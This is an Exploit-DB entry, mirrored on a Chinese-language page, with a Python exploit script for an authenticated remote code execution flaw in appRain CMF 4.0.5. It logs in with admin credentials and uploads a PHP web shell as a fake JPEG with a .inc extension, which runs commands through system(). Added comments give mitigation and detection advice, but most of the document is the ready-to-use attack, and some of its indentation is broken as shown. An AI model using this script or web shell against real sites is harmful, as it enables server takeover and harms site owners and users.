appRain CMF 4.0.5 – Remote Code Execution (RCE) (Authenticated)

  • 作者: Ahmet Ümit BAYRAM
    日期: 2024-06-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/52041/
  • # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)
    # Date: 04/28/2024
    # Exploit Author: Ahmet Ümit BAYRAM
    # Vendor Homepage: https://www.apprain.org
    # Software Link: https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip
    # Version: 4.0.5 (given as "latest" by the author)
    # Tested on: MacOS
    
    import requests
    import sys
    import time
    import random
    import string
    
    def generate_filename():
        """Return a random five-letter lowercase name ending in ``.inc``.

        The result is used by ``upload_shell`` as the name of the uploaded
        file, so it is also the name a defender would find on disk under the
        file manager's upload directory.
        """
        # NOTE(review): the ".inc" suffix presumably matters because the target
        # executes such files as PHP while not blocking them on upload; confirm
        # against the server configuration of a test install.
        letters = random.choices(string.ascii_lowercase, k=5)
        stem = "".join(letters)
        return stem + ".inc"
    
    def login(site, username, password):
        """Log in to the appRain admin panel and return the authenticated session.

        Posts the administrator credentials as a URL-encoded form to
        ``https://{site}/admin/system``. The login is considered successful
        when the response body contains the word "Logout"; otherwise the
        process exits.

        Defender note: every later step depends on this call succeeding, so
        the issue is reachable only with valid administrator credentials.
        Strong, unique admin passwords and restricting who can reach
        ``/admin`` reduce exposure.
        """
        print("Logging in...")
        time.sleep(2)
        http = requests.Session()
        credentials = {
            'data[Admin][admin_id]': username,
            'data[Admin][admin_password]': password,
        }
        form_headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        reply = http.post(
            f"https://{site}/admin/system",
            data=credentials,
            headers=form_headers,
        )
        # Guard clause: anything without the "Logout" marker counts as a failed login.
        if "Logout" not in reply.text:
            print("Login Failed!")
            sys.exit()
        print("Login Successful!")
        return http
    
    # upload_shell(session, site): using the authenticated admin session, post one
    # file to the file-manager upload endpoint and print the URL under
    # /uploads/filemanager/ where that file is then expected to be served.
    # Exits the process when the upload is not confirmed.
    #
    # What the request shows about the weakness:
    #   - the multipart part is declared as 'image/jpeg' while its body is an HTML
    #     form plus PHP that hands the 'cmd' query parameter to system();
    #   - the filename ends in ".inc" (see generate_filename).
    # NOTE(review): a successful run implies the file manager trusts the
    # client-supplied content type / does not block this extension, and that the
    # web server executes ".inc" files in the upload directory as PHP. Confirm
    # both on a test install before relying on this description.
    #
    # Mitigation: validate uploads server-side (extension allowlist and real
    # content inspection), store uploads where script execution is disabled, and
    # restrict access to the admin panel.
    # Detection: a POST to /admin/filemanager/upload followed by GET requests to
    # /uploads/filemanager/<name>.inc carrying a 'cmd' parameter; unexpected
    # ".inc" files in that directory.
    def upload_shell(session, site):
    print("Shell preparing...")
    time.sleep(2)
    filename = generate_filename()
    upload_url = f"https://{site}/admin/filemanager/upload"
    # Multipart field name -> (filename, file content, declared content type).
    # The content literal is line-wrapped by the page and is reproduced unchanged.
    files = {
    'data[filemanager][image]': (filename, "<html><body><form method='GET'
    name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'
    name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'
    value='Execute'></form><pre><?php if(isset($_GET['cmd'])){
    system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')
    }
    # Extra form field sent alongside the file part.
    data = {
    'submit': 'Upload'
    }
    response = session.post(upload_url, files=files, data=data)
    # Success is inferred from HTTP 200 plus the phrase "uploaded successfully"
    # in the response body; the file itself is never requested here.
    if response.status_code == 200 and "uploaded successfully" in response.text:
    print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")
    else:
    print("Exploit Failed!")
    sys.exit()
    
    if __name__ == "__main__":
        # Entry point: expects exactly three arguments (host, admin user name,
        # admin password), then logs in and performs the file-manager upload.
        print("Exploiting...")
        time.sleep(2)
        # The argument count is only checked after the banner and the pause above.
        if len(sys.argv) != 4:
            print("Usage: python exploit.py sitename.com username password")
            sys.exit()
        site, username, password = sys.argv[1:4]
        session = login(site, username, password)
        upload_shell(session, site)